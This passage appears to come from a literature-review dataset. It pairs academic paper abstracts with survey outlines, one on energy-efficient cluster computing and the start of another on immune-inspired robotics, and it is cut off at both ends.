and high performance has resulted in the incorporation of dynamic voltage scaling into processor designs. This feature allows one to make fine granularity trade-offs between power use and performance, provided there is a mechanism in the OS to control that trade-off. In this paper, we describe a novel software approach to automatically controlling dynamic voltage scaling in order to optimize energy use. Our mechanism is implemented in the Linux kernel and requires no modification of user programs. Unlike previous automated approaches, our method works equally well with irregular and multiprogrammed workloads. Moreover, it has the ability to ensure that the quality of interactive performance is within user specified parameters. Our experiments show that as a result of our algorithm, processor energy savings of as much as 75% can be achieved with only a minimal impact on the user experience. --- paper_title: Improvement of power-performance efficiency for high-end computing paper_content: Left unchecked, the fundamental drive to increase peak performance using tens of thousands of power hungry components will lead to intolerable operating costs and failure rates. Recent work has shown application characteristics of single-processor, memory-bound non-interactive codes and distributed, interactive Web services can be exploited to conserve power and energy with minimal performance impact. Our novel approach is to exploit parallel performance inefficiencies characteristic of non-interactive, distributed scientific applications, conserving energy using DVS (dynamic voltage scaling) without impacting time-to-solution (ITS) significantly, reducing cost and improving reliability. We present a software framework to analyze and optimize distributed power-performance using DVS implemented on a 16-node Centrino-based cluster. Using various DVS strategies we achieve application-dependent overall system energy savings as large as 25% with as little as 2% performance impact. --- paper_title: An Energy-Efficient Scheduling Algorithm Using Dynamic Voltage Scaling for Parallel Applications on Clusters paper_content: In the past decade cluster computing platforms have been widely applied to support a variety of scientific and commercial applications, many of which are parallel in nature. However, scheduling parallel applications on large scale clusters is technically challenging due to significant communication latencies and high energy consumption. As such, shortening schedule length and conserving energy consumption are two major concerns in designing economical and environmentally friendly clusters. In this paper, we propose an energy-efficient scheduling algorithm (TDVAS) using the dynamic voltage scaling technique to provide significant energy savings for clusters. The TDVAS algorithm aims at judiciously leveraging processor idle times to lower processor voltages (i.e., the dynamic voltage scaling technique or DVS), thereby reducing energy consumption experienced by parallel applications running on clusters. Reducing processor voltages, however, can inevitably lead to increased execution times of parallel task. The salient feature of the TDVAS algorithm is to tackle this problem by exploiting tasks precedence constraints. Thus, TDVAS applies the DVS technique to parallel tasks followed by idle processor times to conserve energy consumption without increasing schedule lengths of parallel applications. Experimental results clearly show that the TDVAS algorithm is conducive to reducing energy dissipation in large-scale clusters without adversely affecting system performance. --- paper_title: Adaptive, transparent frequency and voltage scaling of communication phases in MPI programs paper_content: Although users of high-performance computing are most interested in raw performance, both energy and power consumption have become critical concerns. Some microprocessors allow frequency and voltage scaling, which enables a system to reduce CPU performance and power when the CPU is not on the critical path. When properly directed, such dynamic frequency and voltage scaling can produce significant energy savings with little performance penalty. This paper presents an MPI runtime system that dynamically reduces CPU performance during communication phases in MPI programs. It dynamically identifies such phases and, without profiling or training, selects the CPU frequency in order to minimize energy-delay product. All analysis and subsequent frequency and voltage scaling is within MPI and so is entirely transparent to the application. This means that the large number of existing MPI programs, as well as new ones being developed, can use our system without modification. Results show that the average reduction in energy-delay product over the NAS benchmark suite is 10% - the average energy reduction is 12% while the average execution time increase is only 2.1% --- paper_title: Reducing power with performance constraints for parallel sparse applications paper_content: Sparse and irregular computations constitute a large fraction of applications in the data-intensive scientific domain. While every effort is made to balance the computational workload in such computations across parallel processors, achieving sustained near machine-peak performance with close-to-ideal load balanced computation-to-processor mapping is inherently difficult. As a result, most of the time, the loads assigned to parallel processors can exhibit significant variations. While there have been numerous past efforts that study this imbalance from the performance viewpoint, to our knowledge, no prior study has considered exploiting the imbalance for reducing power consumption during execution. Power consumption in large-scale clusters of workstations is becoming a critical issue as noted by several recent research papers from both industry and academia. Focusing on sparse matrix computations in which underlying parallel computations and data dependencies can be represented by trees, this paper proposes schemes that save power through voltage/frequency scaling. Our goal is to reduce overall energy consumption by scaling the voltages/frequencies of those processors that are not in the critical path; i.e., our approach is oriented towards saving power without incurring performance penalties. --- paper_title: Performance-constrained Distributed DVS Scheduling for Scientific Applications on Power-aware Clusters paper_content: Left unchecked, the fundamental drive to increase peak performance using tens of thousands of power hungry components will lead to intolerable operating costs and failure rates. High-performance, power-aware distributed computing reduces power and energy consumption of distributed applications and systems without sacrificing performance. Generally, we use DVS (Dynamic Voltage Scaling) technology now available in high-performance microprocessors to reduce power consumption during parallel application runs when peak CPU performance is not necessary due to load imbalance, communication delays, etc. We propose distributed performance-directed DVS scheduling strategies for use in scalable power-aware HPC clusters. By varying scheduling granularity we can obtain significant energy savings without increasing execution time (36% for FT from NAS PB). We created a software framework to implement and evaluate our various techniques and show performance-directed scheduling consistently saves more energy (nearly 25% for several codes) than comparable approaches with less impact on execution time (< 5%). Additionally, we illustrate the use of energy-delay products to automatically select distributed DVS schedules that meet users' needs. --- paper_title: Energy-Efficient Cluster Computing via Accurate Workload Characterization paper_content: This paper presents an eco-friendly daemon that reduces power and energy consumption while better maintaining high performance via an accurate workload characterization that infers “processor stall cycles due to off-chip activities.” The eco-friendly daemon is an interval-based, run-time algorithm that uses the workload characterization to dynamically adjust a processor’s frequency and voltage to reduce power and energy consumption with little impact on application performance. Using the NAS Parallel Benchmarks as our workload, we then evaluate our eco-friendly daemon on a cluster computer. The results indicate that our workload characterization allows the power-aware daemon to more tightly control performance (5% loss instead of 11%) while delivering substantial energy savings (11% instead of 8%). --- paper_title: Profile-based optimization of power performance by using dynamic voltage scaling on a PC cluster paper_content: Currently, several of the high performance processors used in a PC cluster have a DVS (dynamic voltage scaling) architecture that can dynamically scale processor voltage and frequency. Adaptive scheduling of the voltage and frequency enables us to reduce power dissipation without a performance slowdown during communication and memory access. In this paper, we propose a method of profiled-based power-performance optimization by DVS scheduling in a high-performance PC cluster. We divide the program execution into several regions and select the best gear for power efficiency. Selecting the best gear is not straightforward since the overhead of DVS transition is not free. We propose an optimization algorithm to select a gear using the execution and power profile by taking the transition overhead into account. We have built and designed a power-profiling system, PowerWatch. With this system we examined the effectiveness of our optimization algorithm on two types of power-scalable clusters (Crusoe and Turion). According to the results of benchmark tests, we achieved almost 40% reduction in terms of EDP (energy-delay product) without performance impact (less than 5%) compared to results using the standard clock frequency. --- paper_title: Exploring the energy-time tradeoff in MPI programs on a power-scalable cluster paper_content: Recently, energy has become an important issue in high-performance computing. For example, supercomputers that have energy in mind, such as BlueGene/L, have been built; the idea is to improve the energy efficiency of nodes. Our approach, which uses off-the-shelf, high-performance cluster nodes that are frequency scalable, allows energy saving by scaling down the CPU. This paper investigates the energy consumption and execution time of applications from a standard benchmark suite (NAS) on a power-scalable cluster. We study via direct measurement and simulation both intra-node and inter-node effects of memory and communication bottlenecks, respectively. Additionally, we compare energy consumption and execution time across different numbers of nodes. Our results show that a power-scalable cluster has the potential to save energy by scaling the processor down to lower energy levels. Furthermore, we found that for some programs, it is possible to both consume less energy and execute in less time when using a larger number of nodes, each at reduced energy. Additionally, we developed and validated a model that enables us to predict the energy-time tradeoff of larger clusters. --- paper_title: CPU MISER: A Performance-Directed, Run-Time System for Power-Aware Clusters paper_content: Performance and power are critical design constraints in today's high-end computing systems. Reducing power consumption without impacting system performance is a challenge for the HPC community. We present a runtime system (CPU MISER) and an integrated performance model for performance-directed, power-aware cluster computing. CPU MISER supports system-wide, application-independent, fine-grain, dynamic voltage and frequency scaling (DVFS) based power management for a generic power-aware cluster. Experimental results show that CPU MISER can achieve as much as 20% energy savings for the NAS parallel benchmarks. In addition to energy savings, CPU MISER is able to constrain performance loss for most applications within user-specified limits. These constraints are achieved through accurate performance modeling and prediction, coupled with advanced control techniques. --- paper_title: Using multiple energy gears in MPI programs on a power-scalable cluster paper_content: Recently, system architects have built low-power, high-performance clusters, such as Green Destiny. The idea behind these clusters is to improve the energy efficiency of nodes. However, these clusters save power at the expense of performance. Our approach is instead to use high-performance cluster nodes that are frequency- and voltage-scalable; energy can than be saved by scaling down the CPU. Our prior work has examined the costs and benefits of executing an entire application at a single reduced frequency.This paper presents a framework for executing a single application in several frequency-voltage settings. The basic idea is to first divide programs into phases and then execute a series of experiments, with each phase assigned a prescribed frequency. During each experiment, we measure energy consumption and time and then use a heuristic to choose the assignment of frequency to phase for the next experiment.Our results show that significant energy can be saved without an undue performance penalty; particularly, our heuristic finds assignments of frequency to phase that is superior to any fixed-frequency solution. Specifically, this paper shows that more than half of the NAS benchmarks exhibit a better energy-time tradeoff using multiple gears than using a single gear. For example, IS using multiple gears uses 9% less energy and executes in 1% less time than the closest single-gear solution. Compared to no frequency scaling, multiple gear IS uses 16% less energy while executing only 1% longer. --- paper_title: Dynamic cluster reconfiguration for power and performance paper_content: In this chapter we address power conservation for clusters of workstations or PCs. Our approach is to develop systems that dynamically turn cluster nodes on - to be able to handle the load imposed on the system efficiently - and off - to save power under lighter load. The key component of our systems is an algorithm that makes cluster reconfiguration decisions by considering the total load imposed on the system and the power and performance implications of changing the current configuration. The algorithm is implemented in two common cluster-based systems: a network server and an operating system for clustered cycle servers. Our experimental results are very favorable, showing that our systems conserve both power and energy in comparison to traditional systems. --- paper_title: Load Balancing and Unbalancing for Power and Performance in Cluster-Based Systems paper_content: In this paper we address power conservation for clusters of workstations or PCs. Our approach is to develop systems that dynamically turn cluster nodes on – to be able to handle the load imposed on the system efficiently – and off – to save power under lighter load. The key component of our systems is an algorithm that makes load balancing and unbalancing decisions by considering both the total load imposed on the cluster and the power and performance implications of turning nodes off. The algorithm is implemented in two different ways: (1) at the application level for a cluster-based, localityconscious network server; and (2) at the operating system level for an operating system for clustered cycle servers. Our experimental results are very favorable, showing that our systems conserve both power and energy in comparison to traditional systems. --- paper_title: Adaptive, transparent frequency and voltage scaling of communication phases in MPI programs paper_content: Although users of high-performance computing are most interested in raw performance, both energy and power consumption have become critical concerns. Some microprocessors allow frequency and voltage scaling, which enables a system to reduce CPU performance and power when the CPU is not on the critical path. When properly directed, such dynamic frequency and voltage scaling can produce significant energy savings with little performance penalty. This paper presents an MPI runtime system that dynamically reduces CPU performance during communication phases in MPI programs. It dynamically identifies such phases and, without profiling or training, selects the CPU frequency in order to minimize energy-delay product. All analysis and subsequent frequency and voltage scaling is within MPI and so is entirely transparent to the application. This means that the large number of existing MPI programs, as well as new ones being developed, can use our system without modification. Results show that the average reduction in energy-delay product over the NAS benchmark suite is 10% - the average energy reduction is 12% while the average execution time increase is only 2.1% --- paper_title: Performance-constrained Distributed DVS Scheduling for Scientific Applications on Power-aware Clusters paper_content: Left unchecked, the fundamental drive to increase peak performance using tens of thousands of power hungry components will lead to intolerable operating costs and failure rates. High-performance, power-aware distributed computing reduces power and energy consumption of distributed applications and systems without sacrificing performance. Generally, we use DVS (Dynamic Voltage Scaling) technology now available in high-performance microprocessors to reduce power consumption during parallel application runs when peak CPU performance is not necessary due to load imbalance, communication delays, etc. We propose distributed performance-directed DVS scheduling strategies for use in scalable power-aware HPC clusters. By varying scheduling granularity we can obtain significant energy savings without increasing execution time (36% for FT from NAS PB). We created a software framework to implement and evaluate our various techniques and show performance-directed scheduling consistently saves more energy (nearly 25% for several codes) than comparable approaches with less impact on execution time (< 5%). Additionally, we illustrate the use of energy-delay products to automatically select distributed DVS schedules that meet users' needs. ---
Title: An Overview of Energy Efficiency Techniques in Cluster Computing Systems Section 1: Introduction and motivation Description 1: This section provides the background, historical context, and the importance of energy efficiency in cluster computing systems. Section 2: Static power management Description 2: This section discusses various static power management (SPM) techniques, including the use of low-power components and examples of successful implementations. Section 3: Dynamic power management Description 3: This section explores dynamic power management (DPM) techniques, focusing on real-time adaptation based on resource utilization and workload. Section 4: Software and power-scalable components Description 4: This section elaborates on the role of software and power-scalable components in DPM, including dynamic voltage and frequency scaling (DVFS) modules and their related scheduling strategies. Section 5: Power-scalable memory Description 5: This section covers dynamic power-scalable memory management systems and their effectiveness in reducing energy consumption in cluster computing. Section 6: Power-scalable processors Description 6: This section examines power-scalable processors, such as those using DVFS, and their impact on energy savings and performance. Section 7: Load balancing Description 7: This section discusses load balancing techniques aimed at distributing workload to achieve optimal resource utilization and energy efficiency. Section 8: Discussion Description 8: This section summarizes the findings, highlights the challenges of achieving energy efficiency in cluster computing, and suggests future directions in terms of power management techniques. Section 9: Conclusion Description 9: This section concludes the paper by summarizing the key points discussed and their implications for energy efficiency in cluster computing systems.
Immuno-inspired robotic applications: a review
9
--- paper_title: Application areas of AIS: The past, the present and the future paper_content: After a decade of research into the area of artificial immune systems, it is worthwhile to take a step back and reflect on the contributions that the paradigm has brought to the application areas to which it has been applied. Undeniably, there have been a lot of successful stories-however, if the field is to advance in the future and really carve out its own distinctive niche, then it is necessary to be able to illustrate that there are clear benefits to be obtained by applying this paradigm rather than others. This paper attempts to take stock of the application areas that have been tackled in the past, and ask the difficult question ''was it worth it ?''. We then attempt to suggest a set of problem features that we believe will allow the true potential of the immunological system to be exploited in computational systems, and define a unique niche for AIS. --- paper_title: Applying inter-layer conflict resolution to hybrid robot control architectures paper_content: In this document, we propose and examine the novel use of a learning mechanism between the reactive and deliberative layers of a hybrid robot control architecture. Balancing the need to achieve complex goals and meet real-time constraints, many modern mobile robot navigation control systems make use of a hybrid deliberative-reactive architecture. In this paradigm, a high-level deliberative layer plans routes or actions toward a known goal, based on accumulated world knowledge. A low-level reactive layer selects motor commands based on current sensor data and the deliberative layer’s plan. The desired system-level effect of this architecture is that the robot is able to combine complex reasoning toward global objectives with quick reaction to local constraints. ::: Implicit in this type of architecture, is the assumption that both layers are using the same model of the robot’s capabilities and constraints. It may happen, for example, due to differences in representation of the robot’s kinematic constraints, that the deliberative layer creates a plan that the reactive layer cannot follow. This sort of conflict may cause a degradation in system-level performance, if not complete navigational deadlock. Traditionally, it has been the task of the robot designer to ensure that the layers operate in a compatible manner. However, this is a complex, empirical task. ::: Working to improve system-level performance and navigational robustness, we propose introducing a learning mechanism between the reactive layer and the deliberative layer, allowing the deliberative layer to learn a model of the reactive layer’s execution of its plans. First, we focus on detecting this inter-layer conflict, and acting based on a corrected model. This is demonstrated on a physical robotic platform in an unstructured outdoor environment. Next, we focus on learning a model to predict instances of inter-layer conflict, and planning to act with respect to this model. This is demonstrated using supervised learning in a physics-based simulation environment. Results and algorithms are presented. --- paper_title: Assessing cooperation in human control of heterogeneous robots paper_content: Human control of multiple robots has been characterized by the average demand of single robots on human attention. While this matches situations in which independent robots are controlled sequentially it does not capture aspects of demand associated with coordinating dependent actions among robots. This paper presents an extension of Crandall's neglect tolerance model intended to accommodate both coordination demands (CD) and heterogeneity among robots. The reported experiment attempts to manipulate coordination demand by varying the proximity needed to perform a joint task in two conditions and by automating coordination within subteams in a third. Team performance and the process measure CD were assessed for each condition. Automating cooperation reduced CD and improved performance. We discuss the utility of process measures such as CD to analyze and improve control performance. --- paper_title: Immunological Computation: Theory and Applications paper_content: Over the last decade, the field of immunological computation has progressed slowly and steadily as a branch of computational intelligence. Immunological Computation: Theory and Applications presents up-to-date immunity-based computational techniques. After a brief review of fundamental immunology concepts, the book presents computational models based on the negative selection process that occurs in the thymus. It then examines immune networks, including continuous and discrete immune network models, clonal selection, hybrid models, and computational models based on danger theory. The book also discusses real-world applications for all of the models covered in each chapter. --- paper_title: Evolving Mobile Robots Able to Display Collective Behaviors paper_content: We present a set of experiments in which simulated robots are evolved for the ability to aggregate and move together toward a light target. By developing and using quantitative indexes that capture the structural properties of the emerged formations, we show that evolved individuals display interesting behavioral patterns in which groups of robots act as a single unit. Moreover, evolved groups of robots with identical controllers display primitive forms of situated specialization and play different behavioral functions within the group according to the circumstances. Overall, the results presented in the article demonstrate that evolutionary techniques, by exploiting the self-organizing behavioral properties that emerge from the interactions between the robots and between the robots and the environment, are a powerful method for synthesizing collective behavior. --- paper_title: Evolving Homogeneous Neurocontrollers for a Group of Heterogeneous Robots: Coordinated Motion, Cooperation, and Acoustic Communication paper_content: This article describes a simulation model in which artificial evolution is used to design homogeneous control structures and adaptive communication protocols for a group of three autonomous simulated robots. The agents are required to cooperate in order to approach a light source while avoiding collisions. The robots are morphologically different: Two of them are equipped with infrared sensors, one with light sensors. Thus, the two morphologically identical robots should take care of obstacle avoidance; the other one should take care of phototaxis. Since all of the agents can emit and perceive sound, the group's coordination of actions is based on acoustic communication. The results of this study are a proof of concept: They show that dynamic artificial neural networks can be successfully synthesized by artificial evolution to design the neural mechanisms required to underpin the behavioral strategies and adaptive communication capabilities demanded by this task. Postevaluation analyses unveil operational aspects of the best evolved behavior. Our results suggest that the building blocks and the evolutionary machinery detailed in the article should be considered in future research work dealing with the design of homogeneous controllers for groups of heterogeneous cooperating and communicating robots. --- paper_title: Decentralized Cooperative Policy for Conflict Resolution in Multivehicle Systems paper_content: In this paper, we propose a novel policy for steering multiple vehicles between assigned start and goal configurations, ensuring collision avoidance. The policy rests on the assumption that all agents are cooperating by implementing the same traffic rules. However, the policy is completely decentralized, as each agent decides its own motion by applying those rules only on the locally available information, and scalable, in the sense that the amount of information processed by each agent and the computational complexity of the algorithms do not increase with the number of agents in the scenario. The proposed policy applies to systems in which new vehicles may enter the scene and start interacting with existing ones at any time, while others may leave. Under mild conditions on the initial configurations, the policy is shown to be safe, i.e., it guarantees collision avoidance throughout the system evolution. In the paper, conditions are discussed on the desired configurations of agents, under which the ultimate convergence of all vehicles to their goals can also be guaranteed. To show that such conditions are actually necessary and sufficient, which turns out to be a challenging liveness-verification problem for a complex hybrid automaton, we employ a probabilistic verification method. The paper finally presents and discusses simulations for systems of several tens of vehicles, and reports on some experimental implementation showing the practicality of the approach. --- paper_title: An overview of planning technology in robotics paper_content: We present here an overview of several planning techniques in robotics. We will not be concerned with the synthesis of abstract mission and task plans, using well known classical and other domain-independent planning techniques. We will mainly focus on to how refine such abstract plans into robust sensory-motor actions and on some planning techniques that can be useful for that. --- paper_title: A theory of self-nonself discrimination. paper_content: 1) Induction of humoral antibody formation involves the obligatory recognition of two determinants on an antigen, one by the receptor antibody of the antigen-sensitive cell and the other by carrier antibody (associative interaction). 2) Paralysis of antibody formation involves the obligatory recognition of only one determinant by the receptor antibody of the antigen-sensitive cell; that is, a nonimmunogenic molecule (a hapten) can paralyze antigen-sensitive cells. 3) There is competition between paralysis and induction at the level of the antigen-sensitive cell. 4) The mechanisms of low- and high-zone paralysis, and maintenance of the unresponsive state, are identical. 5) High-zone paralysis occurs when both the carrier antibody and the receptor antibody are saturated, so that associated interactions cannot take place. 6) The mechanisms of paralysis and induction for the carrier-antigen-sensitive cell are identical to those for the humoral-antigen-sensitive cell. 7) The formation of carrier-antigen-sensitive cells is thymus-dependent, whereas humoral-antigen-sensitive cells are derived from bone marrow. Since carrier antibody is required for induction, all antigens are thymus-dependent. 8) The interaction of antigen with the receptor antibody on an antigen-sensitive cell results in a conformational change in an invariant region of the receptor and consequently paralyzes the cell. As the receptor is probably identical to the induced antibody, all antibody molecules are expected to be able to undergo a conformational change on binding a hapten. The obligatory associated recognition by way of carrier antibody (inductive signal) involves a conformational change in the carrier antibody, leading to a second signal to the antigen-sensitive cell. 9) The foregoing requirements provide an explanation for self-nonself discrimination. Tolerance to self-antigens involves a specific deletion in the activity of both the humoral- and the carrier-antigen-sensitive cells. --- paper_title: The danger model: A renewed sense of self paper_content: For over 50 years immunologists have based their thoughts, experiments, and clinical treatments on the idea that the immune system functions by making a distinction between self and nonself. Although this paradigm has often served us well, years of detailed examination have revealed a number of inherent problems. This Viewpoint outlines a model of immunity based on the idea that the immune system is more concerned with entities that do damage than with those that are foreign. --- paper_title: The danger model: A renewed sense of self paper_content: For over 50 years immunologists have based their thoughts, experiments, and clinical treatments on the idea that the immune system functions by making a distinction between self and nonself. Although this paradigm has often served us well, years of detailed examination have revealed a number of inherent problems. This Viewpoint outlines a model of immunity based on the idea that the immune system is more concerned with entities that do damage than with those that are foreign. --- paper_title: A Paratope is Not an Epitope: Implications for Immune Network Models and Clonal Selection paper_content: Artificial Immune Systems (AIS) research into clonal selection and immune network models has tended to use a single, real-valued or binary vector to represent both the paratope and epitope of a B-cell; in this paper, the use of alternative representations is discussed. A theoretical generic immune network (GIN) is presented, that can be used to explore the network dynamics of several families of different B-cell representations at the same time, and that combines features of clonal selection and immune networks in a single model. --- paper_title: Improved Pattern Recognition with Artificial Clonal Selection? paper_content: In this paper, we examine the clonal selection algorithm CLONALG and the suggestion that it is suitable for pattern recognition. CLONALG is tested over a series of binary character recognition tasks and its performance compared to a set of basic binary matching algorithms. A number of enhancements are made to the algorithm to improve its performance and the classification tests are repeated. Results show that given enough data CLONALG can successfully classify previously unseen patterns and that adjustments to the existing algorithm can improve performance. --- paper_title: Immunological Computation: Theory and Applications paper_content: Over the last decade, the field of immunological computation has progressed slowly and steadily as a branch of computational intelligence. Immunological Computation: Theory and Applications presents up-to-date immunity-based computational techniques. After a brief review of fundamental immunology concepts, the book presents computational models based on the negative selection process that occurs in the thymus. It then examines immune networks, including continuous and discrete immune network models, clonal selection, hybrid models, and computational models based on danger theory. The book also discusses real-world applications for all of the models covered in each chapter. --- paper_title: The immune system, adaptation, and machine learning paper_content: Abstract The immune system is capable of learning, memory, and pattern recognition. By employing genetic operators on a time scale fast enough to observe experimentally, the immune system is able to recognize novel shapes without preprogramming. Here we describe a dynamical model for the immune system that is based on the network hypothesis of Jerne, and is simple enough to simulate on a computer. This model has a strong similarity to an approach to learning and artificial intelligence introduced by Holland, called the classifier system. We demonstrate that simple versions of the classifier system can be cast as a nonlinear dynamical system, and explore the analogy between the immune and classifier systems in detail. Through this comparison we hope to gain insight into the way they perform specific tasks, and to suggest new approaches that might be of value in learning systems. --- paper_title: Stability of symmetric idiotypic networks—A critique of Hoffmann's analysis paper_content: Hoffmann (1982) analysed a very simple model of suppressive idiotypic immune networks and showed that idiotypic interactions are stabilizing. He concluded that immune networks provide a counterexample to the general analysis of large dynamic systems (Gardner and Ashby, 1970; May, 1972). The latter is often verbalized as: an increase in size and/or connectivity decreases the system stability. We here analyse this apparent contradiction by extending the Hoffmann model (with a decay term), and comparing it to an ecological model that was used as a paradigm in the general analysis. Our analysis confirms that the neighbourhood stability of such idiotypic networks increases with connectivity and/or size. However, the contradiction is one of interpretation, and is not due to exceptional properties of immune networks. The contradiction is caused by the awkward normalization used in the general analysis. --- paper_title: The 'complete' idiotype network is an absurd immune system. paper_content: Idiotypic networks have attained the status of unavoidable necessities in the regulation of immune responses. In this article Rod Langman and Mel Cohn contend that the conceptual foundations for such idiotypic networks are formal absurdities. --- paper_title: Integrated Innate and Adaptive Artificial Immune Systems Applied to Process Anomaly Detection paper_content: This thesis explores the design and application of artificial immune systems (AISs), problem-solving systems inspired by the human and other immune systems. AISs to date have largely been modelled on the biological adaptive immune system and have taken little inspiration from the innate immune system. The first part of this thesis examines the biological innate immune system, which controls the adaptive immune system. The importance of the innate immune system suggests that AISs should also incorporate models of the innate immune system as well as the adaptive immune system. This thesis presents and discusses a number of design principles for AISs which are modelled on both innate and adaptive immunity. These novel design principles provided a structured framework for developing AISs which incorporate innate and adaptive immune systems in general. These design principles are used to build a software system which allows such AISs to be implemented and explored. AISs, as well as being inspired by the biological immune system, are also built to solve problems. In this thesis, using the software system and design principles we have developed, we implement several novel AISs and apply them to the problem of detecting attacks on computer systems. These AISs monitor programs running on a computer and detect whether the program is behaving abnormally or being attacked. The development of these AISs shows in more detail how AISs built on the design principles can be instantiated. In particular, we show how the use of AISs which incorporate both innate and adaptive immune system mechanisms can be used to reduce the number of false alerts and improve the performance of current approaches. --- paper_title: Articulation and Clarification of the Dendritic Cell Algorithm paper_content: The Dendritic Cell algorithm (DCA) is inspired by recent work in innate immunity. In this paper a formal description of the DCA is given. The DCA is described in detail, and its use as an anomaly detector is illustrated within the context of computer security. A port scan detection task is performed to substantiate the influence of signal selection on the behaviour of the algorithm. Experimental results provide a comparison of differing input signal mappings. --- paper_title: Danger Theory: The Link between AIS and IDS? paper_content: We present ideas about creating a next generation Intrusion Detection System based on the latest immunological theories. The central challenge with computer security is determining the difference between normal and potentially harmful activity. For half a century, developers have protected their systems by coding rules that identify and block specific events. However, the nature of current and future threats in conjunction with ever larger IT systems urgently requires the development of automated and adaptive defensive tools. A promising solution is emerging in the form of Artificial Immune Systems. The Human Immune System can detect and defend against harmful and previously unseen invaders, so can we not build a similar Intrusion Detection System for our computers. --- paper_title: An immunological approach to mobile robot reactive navigation paper_content: In this paper, a reactive immune network (RIN) is proposed and employed for mobile robot navigation within unknown environments. Rather than building a detailed mathematical model of artificial immune systems, this study tries to explore the principle in an immune network focusing on its self-organization, adaptive learning capability, and immune feedback. In addition, an adaptive virtual target method is integrated to solve the local minima problem in navigation. Several trapping situations designed by the early researchers are adopted to evaluate the performance of the proposed architecture. Simulation results show that the mobile robot is capable of avoiding obstacles, escaping traps, and reaching the goal efficiently and effectively. --- paper_title: Immunity-based autonomous guided vehicles control paper_content: The human immune system is a self-organizing and highly distributed multi-agent system. These properties impart a high degree of robustness and performance that has created great interest in implementing engineering systems. This adopted engineering analogue is called Artificial Immune System (AIS). This paper presents an immunity-based control framework which has the ability to detect changes, adapt to dynamic environment and coordinate vehicles activities for goals achievement, to deploy a fleet of AGVs for material handling in an automated warehouse. A robust and flexible automated warehousing system is achieved through the non-deterministic and fully decentralized origination of AGVs. --- paper_title: Modeling a MultiAgent Mobile Robotics Test Bed Using a Biologically Inspired Artificial Immune System paper_content: The biological immune system is a complex, adaptive, pattern-recognition system that defends the body from foreign pathogens. The system uses learning, memory, and associative retrieval to solve recognition issues and classification of tasks. In particular, it learns to recognize relevant problems, remember those encountered in the past, and uses combinations to construct problem detectors efficiently. This paper explores an application of an adaptive learning mechanism for robots based on the natural immune system, using two algorithms, viz., the behavior arbitration mechanism and the clonal selection algorithm to demonstrate the innate and adaptive immune response respectively. The work highlights the innate and adaptive characteristics of the immune system, wherein a robot learns to detect vulnerable areas of a track and adapts to the required speed over such portions. A detailed study of the artificial immune metaphor is carried out and mapped onto the robot world. The robotics test bed comprised of two Lego robots deployed simultaneously on two predefined near concentric tracks with the outer robot capable of helping the inner one when it misaligns. The inner robot raises an SOS signal on misalignment. The outer robot aids the inner robot to regain it alignment exhibiting the innate immunity. The adaptive system within the inner robot learns to tackle the problem in future using Clonal Selection mechanism. --- paper_title: Clonal selection based mobile robot path planning paper_content: Clonal selection based mobile robot global path planning method is presented in the article, which is composed of encoding of antibody, fitness function construct, selection strategy and immune operator definition. Path distance and degree of intersecting with obstacle are both considered in the definition of fitness function. Mutation operator, insert operator and delete operator are designed according to the problem of mobile robot path planning. Mutation is different in genetic algorithm (GA) from in clonal selection, In the GA, mutation aims improving diversity of population, while in the clonal selection, mutation aims accelerating convergence of algorithm. The algorithm proposed in the paper spends less time and have better result of path planning than GA. The efficiency of proposed method is validated by simulation with MATLAB. --- paper_title: A hybrid immune evolutionary computation based on immunity and clonal selection for concurrent mapping and localization paper_content: This paper addresses the problem of Concurrent Mapping and Localization(CML) by means of a hybrid immune evolutionary computation based on immunity and clonal selection for a mobile robot. An immune operator, a vaccination operator, is designed in the algorithm. The experiment results of a real mobile robot show that the computational expensiveness of the algorithm in this paper is less than other algorithms and the maps obtained are very accurate. --- paper_title: An evolutionary algorithm with population immunity and its application on autonomous robot control paper_content: The natural immune system is an important resource full of inspirations for the theory researchers and the engineering developers to design some powerful information processing methods aiming at difficult problems. Based on this consideration, a novel optimal-searching algorithm, the immune mechanism based evolutionary algorithm - IMEA, is proposed for the purpose of finding an optimal/quasi-optimal solution in a multi-dimensional space. Different from the ordinary evolutionary algorithms, on one hand, due to the long-term memory, IMEA has a better capability of learning from its experience, and on the other hand, with the clonal selection, it is able to keep from the premature convergence of population. With the simulation on autonomous robot control, it is proved that IMEA is good at the task of adaptive adjustment (offline), and it can improve the robot's capability of reinforcement learning, so as to make itself able to sense its surrounding dynamic environment. --- paper_title: Realization of cooperative strategies and swarm behavior in distributed autonomous robotic systems using artificial immune system paper_content: In this paper, we propose a method of cooperative control (T-cell modeling) and selection of group behavior strategy (B-cell modeling) based on the immune system in a distributed autonomous robotic system (DARS). The immune system is a living body's self-protection and self-maintenance system. These features can be applied to decision making of optimal swarm behavior in a dynamically changing environment. To apply the immune system to DARS, a robot is regarded as a B-cell, each environmental condition as an antigen, a behavior strategy as an antibody and control parameter as a T-cell respectively. When the environmental condition changes, a robot selects an appropriate behavior strategy, and its behavior strategy is stimulated and suppressed by other robots using communication. Finally, the most stimulated strategy is adopted as the swarm behavior strategy. This control scheme is based on clonal selection and idiotopic network hypothesis. It is used for decision making of the optimal swarm strategy. By T-cell modeling, the adaptation ability of the robot is enhanced in dynamic environments. --- paper_title: Immunoid: An Immunological Approach to Decentralized Behavoir Arbitration of Autonomous Mobile Robots paper_content: Conventional artificial intelligent (AI) system have been criticized for its brittleness under hostile/dynamic changing environments. Therefore, recently much attention has been focused on the reactive planning systems such as behavior-based AI. However, in the behavior-based AI approaches, how to construct a mechanism that realizes adequate arbitration among competence modules is still an open question. In this paper, we propose a new decentralized consensus-making system inspired from the biological immune system. And we apply our proposed method to behavior arbitration of an autonomous mobile robot as a practical example. To verify the feasibility of our method, we carry out some experiments. In addition, we propose an adaptation mechanism, and try to construct a suitable immune network for adequate action selection. --- paper_title: Emergent construction of behavior arbitration mechanism based on the immune system paper_content: We have been investigating a new behavior arbitration mechanism based on the biological immune system. The behavior arbitration mechanism and the biological immune system share certain similarities since both systems deal with various sensory inputs (antigens) through interactions among multiple competence modules (lymphocytes and/or antibodies). We have demonstrated the flexible arbitration abilities of our proposed method, however, we have not previously shown a solution to the problem: how do we prepare an appropriate repertoire of competence modules? In this paper, in order to construct an appropriate immune network without human intervention, we try to incorporate an off-line metadynamics function into our previously proposed mechanism. The metadynamics function is an adaptation realized by varying the structure of the immune network. To accomplish this function, we use a genetic algorithm with a devised crossover operator. Finally, we verify our method by carrying out simulations. --- paper_title: Decentralized control system for autonomous navigation based on an evolved artificial immune network paper_content: This paper investigates an autonomous control system of a mobile robot based on the immune network theory. The immune network navigates the robot to solve a multiobjective task, namely, garbage collection: the robot must find and collect garbage, while it establishes a trajectory without colliding with obstacles, and return to the base before it runs out of energy. Each network node 